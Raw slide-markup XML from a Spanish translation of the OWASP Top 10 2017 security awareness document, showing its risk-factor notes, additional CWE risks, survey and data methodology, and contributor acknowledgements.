                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>usted debe considerar sus propios agentes de amenaza e impactos de negocio específicos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Incluso las vulnerabilidades graves de software podrían no representar un riesgo serio si no hay agentes de amenaza en posición para ejecutar el ataque necesario, o el impacto al negocio es insignificante para los activos involucrados.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="100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4155703649"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6708195"/>
          <a:ext cx="6858000" cy="31939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7721">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Riesgos adicionales a considerar</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR" sz="1600" b="1" noProof="0"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816272">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El Top 10 cubre una gran cantidad de terreno, pero existen otros riesgos que debería considerar y evaluar en su organización. Algunos de éstos se han publicado en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>versiones previas del Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, y otros no, incluyendo nuevas técnicas de ataque que son identificadas constantemente. Estos son algunos otros riesgos importantes de seguridad en aplicaciones que también debería considerar, ordenados según su identificador de CWE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a: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5"/>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6"/>
                        </a:rPr>
                        <a:t>CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', 'AppDoS')</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7"/>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8"/>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9"/>
                        </a:rPr>
                        <a:t>CWE-601: Unvalidated Forward and Redirects</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10"/>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11"/>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aseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12"/>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t>+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" sz="2600" noProof="0" dirty="0"/>
              <a:t>Detalles acerca de los factores de Riesgo</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="2600" noProof="0" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53676CCE-7A8C-452F-B40C-210EAA7250B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2383064"/>
            <a:ext cx="6858000" cy="3976147"/>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712859014"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6858000" cy="901436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s-AR" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Visión</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pPr>
                        <a:lnSpc>
                          <a:spcPct val="105000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>En el Congreso del Proyecto OWASP, participantes activos y miembros de la comunidad decidieron tener una visión de futuro, enfocados en dos tipos de vulnerabilidades, con un orden definido parcialmente por datos cuantitativos y encuestas cualitativas</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="100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b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Encuesta a la Industria</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pPr>
                        <a:lnSpc>
                          <a:spcPct val="105000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Para la encuesta, recopilamos las categorías de vulnerabilidades que estaban identificadas previamente como “en la cúspide” o que se mencionaban en la lista de correo de OWASP Top 10 2017 RC1. Las incluimos en una encuesta </a:t>
                      </a:r>
                      <a:r>
                        <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ordenada</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> y le pedimos a los encuestados que clasificaran las cuatro principales vulnerabilidades que consideraban deberían incluirse en el OWASP Top 10. La encuesta se realizó del 2 de agosto al 18 de septiembre de 2017. Se obtuvieron 516 respuestas y luego se clasificaron las vulnerabilidades</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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a:lnSpc>
                          <a:spcPct val="105000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>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La exposición de la información privada es claramente la vulnerabilidad de mayor puntuación, pudiéndose considerar como un caso específico de la ya </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>existente </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="0"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 Exposición de Datos Sensibles</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 Las fallas criptográficas se pueden considerar dentro de la exposición de datos sensibles. La deserialización insegura fue clasificada en el tercer lugar, por lo que se agregó al Top 10 como </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="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 Deserialización Insegura</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="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luego de haber clasificado su riesgo. La cuarta, datos controlados por el usuario, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>incluida en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="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 Pérdida de Control de Acceso</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, es bueno </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verla en la encuesta, ya que no hay muchos datos relacionados con vulnerabilidades de autorización. La categoría número cinco según la encuesta es Registro y Monitoreo Insuficientes, que es una buena opción para ser agregada a la lista de los 10 Principales, razón por la cual se ha convertido en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="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 Registro y Monitoreo Insuficientes</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 Hemos llegado a un punto en el que las aplicaciones necesitan ser capaces de definir lo que puede ser un ataque y generar registros, alertas, escalamiento y respuestas adecuados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b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Llamada pública de datos</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pPr>
                        <a:lnSpc>
                          <a:spcPct val="105000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>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Tradicionalmente, los datos recopilados y analizados se basaban más en la frecuencia y en cuántas vulnerabilidades eran detectadas en las aplicaciones probadas. Como es bien sabido, las herramientas reportan tradicionalmente todos los casos encontrados de una vulnerabilidad y los seres humanos reportan tradicionalmente un solo hallazgo con un número de ejemplos. Esto hace que sea muy difícil agregar los dos estilos de reporte de forma comparable.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="105000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>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Para la versión 2017, la tasa de incidencia se calculó en función del número de aplicaciones, en un conjunto de datos dado, que tenían uno o más tipos específicos de vulnerabilidades. Los datos de los contribuyentes más grandes fueron recolectados de dos formas: la primera fue la manera tradicional de contar cada instancia encontrada de una vulnerabilidad; mientras que la segunda fue el conteo de aplicaciones en las que se encontró cada vulnerabilidad (una o más veces). Aunque no es perfecto, esto nos permite comparar razonablemente los datos de obtenidos tanto por las herramientas asistidas por humanos como por pruebas humanas asistidas por herramientas. Los datos en bruto y el trabajo de análisis se encuentran </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>disponibles en GitHub</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 Nos proponemos ampliarlo con una estructura adicional de datos en futuras versiones del Top 10.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="105000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Recibimos más de 40 respuestas al llamado público de datos. Dado que muchas de ellas procedían del público original que se centraba en la frecuencia, pudimos utilizar datos de 23 contribuyentes que cubrían unas 114.000 aplicaciones aproximadamente. Cuando fue posible, utilizamos un periodo de tiempo de un año identificado por el colaborador. La mayoría de las aplicaciones son únicas, aunque reconocemos la existencia de algunas aplicaciones repetidas entre los datos anuales de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" i="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Veracode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Los 23 conjuntos de datos utilizados se identificaron como pruebas humanas asistidas por herramientas o bien como tasas de incidencia proporcionadas específicamente por herramientas asistidas por humanos. Las anomalías en los datos seleccionados de incidencia del 100%+ se ajustaron hasta el 100% máximo. Para calcular la tasa de incidencia, se calculó el porcentaje de las aplicaciones totales que contenían cada tipo de vulnerabilidad. La clasificación de la incidencia se utilizó para el cálculo de la prevalencia en el riesgo global en la clasificación del Top 10.</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s-AR" sz="3500" noProof="0" dirty="0"/>
              <a:t>+DAT</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="3600" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
              <a:t>Metodología y Datos</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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1110519655"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="413665" y="3147432"/>
          <a:ext cx="5980198" cy="1413540"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="374376">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5065000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="540822">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s-AR" sz="1000" b="1" i="0" noProof="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s-AR" sz="1400" i="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0DFF1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="1" i="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Categorías de Vulnerabilidad de la Encuesta</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR" sz="1400" i="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0DFF1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="1" i="0" noProof="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Puntos</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR" sz="1400" i="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0DFF1"/>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just">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Exposición de Información Privada (“Violación de Privacidad”)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9"/>
                        </a:rPr>
                        <a:t>CWE-359</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just">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Fallas criptográficas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0"/>
                        </a:rPr>
                        <a:t>CWE-310</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 /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1"/>
                        </a:rPr>
                        <a:t>311</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 /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2"/>
                        </a:rPr>
                        <a:t>312</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 /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3"/>
                        </a:rPr>
                        <a:t>326</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 /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4"/>
                        </a:rPr>
                        <a:t>327</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just">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Deserialización de datos no confiables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5"/>
                        </a:rPr>
                        <a:t>CWE-502</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just">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Salteo de autorización a través de entradas de datos controladas por el usuario (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" i="1" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>IDOR &amp; Path Traversal</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6"/>
                        </a:rPr>
                        <a:t>CWE-639</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just">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Registro y Monitoreo Insuficientes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7"/>
                        </a:rPr>
                        <a:t>CWE-223</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 / </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hlinkClick r:id="rId18"/>
                        </a:rPr>
                        <a:t>778</a:t>
                      </a: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ctr">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="180"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="180"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="10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s-ES" sz="100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8580" marR="68580" marT="0" marB="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s-AR" sz="3500" noProof="0" dirty="0"/>
              <a:t>+ACK</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="3600" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
              <a:t>Agradecimientos</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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40922221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es-AR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Agradecimientos a los contribuyentes de datos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10000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <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Quisiéramos agradecer a las muchas organizaciones que contribuyeron con datos sobre vulnerabilidades que sostienen la actualización del 2017:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endPar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1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <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Por primera vez, todos los contribuyentes de datos para el Top 10, y la lista completa de contribuyentes se encuentra </a:t>
                      </a:r>
                      <a:r>
                        <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4"/>
                        </a:rPr>
                        <a:t>disponible públicamente</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR"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AR"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Agradecimientos a contribuyentes particulares</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="es-AR"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10000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="100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Quisiéramos agradecer a los contribuyentes particulares que han colaborado con horas de dedicación y contribución colectiva para el Top 10 en GitHub.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="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u="none" kern="120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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="92D05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10000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="92D05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10000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR"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Y a todos los que han provisto </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="1"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feedback</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR"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a través de twitter, correo electrónico y otros medios.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR"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Seríamos negligentes si dejáramos de mencionar a Dirk Wetter, Jim Manico y Osama Elnaggar por habernos provisto asistencia. También, a Chris Frohoff y Gabriel Lawrence por su invaluable aporte en la escritura del nuevo riesgo </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR"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 Deserialización Insegura</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="12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14985" y="5673081"/>
            <a:ext cx="6858000" cy="3240359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="5" spcCol="274320" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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ak47gen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alonergan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ameft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anantshri</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bandrzej</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bchurchill</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binarious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bkimminich</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Boberski</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borischen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Calico90</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chrish</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clerkendweller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D00gs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davewichers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drkknight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drwetter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dune73</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ecbftw</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einsweniger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ekobrin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eoftedal</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frohoff</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fzipi</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gebl</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Gilc83</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gilzow</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global4g</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grnd</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h3xstream</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hiralph</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HoLyVieR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ilatypov</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irbishop</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itscooper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ivanr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jeremylong</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jhaddix</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jmanico</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joaomatosf</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jrmithdobbs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jsteven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jvehent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katyanton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kerberosmansour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koto</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m8urnett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m